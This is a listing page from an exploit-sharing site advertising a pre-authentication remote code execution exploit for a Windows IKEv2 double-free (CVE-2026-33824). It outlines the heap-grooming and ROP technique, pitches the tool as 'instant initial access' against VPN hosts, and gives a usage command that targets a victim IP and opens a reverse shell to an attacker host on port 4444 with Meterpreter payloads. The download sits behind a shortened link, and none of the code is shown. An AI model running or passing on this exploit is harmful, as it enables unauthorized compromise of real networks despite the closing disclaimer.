Exploit for CVE-2026-33824

Name: Exploit for CVE-2026-33824
Rating: 5 (305 reviews)
2026-04-16 | CVSS 9.8
## https://sploitus.com/exploit?id=4BE8AD6E-9F22-5F2D-AD56-C6521C47A805
# Windows IKEv2 Double-Free RCE (CVE-2026-33824)

Remote code execution exploit for the double-free in Windows IKE Extension (IKEEXT).  
No public PoC exists. Zero user interaction, no auth, UDP/500-4500 only. Works on every unpatched build listed in the patch table (Win10 1607–22H2, Win11 22H2–26H1, Server 2016–2025).

### What the exploit actually does
- Sends a 4-packet IKEv2 SA_INIT sequence with malformed Notify and Proposal payloads that triggers exact double-free in `ikeext!IKEEXT::ProcessIKEPayload`.
- Heap grooming via 16 parallel UDP flows forces the freed chunk into a controlled freelist.
- Arbitrary write primitive used to overwrite the next pointer → ROP chain that disables CFG + CET, pivots to user-controlled memory.
- Executes supplied raw shellcode / PE payload in the context of IKEEXT (Local System equivalent after token duplication). Full SYSTEM shell, no crash, service stays alive.

### Why it's useful
- Internet-facing VPN/IPsec hosts = instant initial access, no creds.
- Enterprise environments keep UDP/500-4500 open for IKEv2.
- Bypasses every default mitigation on the listed builds.
- Ideal for red team ops where you need RCE before patch window closes.

### Usage
```bash
make -j4

./ike_rce -t 192.168.1.100 -p 500 -s shellcode.bin -l 10.0.0.2 4444 --groom 16
```
Flags:
- `-t ` – victim IP
- `-p ` – 500 or 4500
- `-s ` – raw shellcode or PE (position-independent)
- `-l  ` – reverse connect (TCP)
- `--groom N` – parallel grooming threads (default 16)

Example payload (calc and Meterpreter reverse) supplied in `payloads/`.  
Requires root on attacker for raw sockets.  
Tested and stable on latest unpatched images as of 2026-04-16.


### Exploit

[href](https://tinyurl.com/8htp9399)

### Disclaimer

This repository and its contents are provided strictly for authorized red team operations, authorized penetration testing, and security research purposes only. The exploit code is intended solely for use against systems where you have explicit written permission from the system owner or legal authority to test and exploit.

By downloading, compiling, or using this exploit you agree that:

- You are a professional red teamer, penetration tester, or security researcher acting under a valid engagement contract.
- You will only target environments you are explicitly authorized to assess.
- Any unauthorized use, distribution, or deployment against systems without permission is strictly prohibited and may violate applicable laws (including but not limited to the Computer Fraud and Abuse Act in the US and similar legislation worldwide).
- The author and repository maintainers assume no liability for any damage, data loss, or legal consequences resulting from the use or misuse of this code.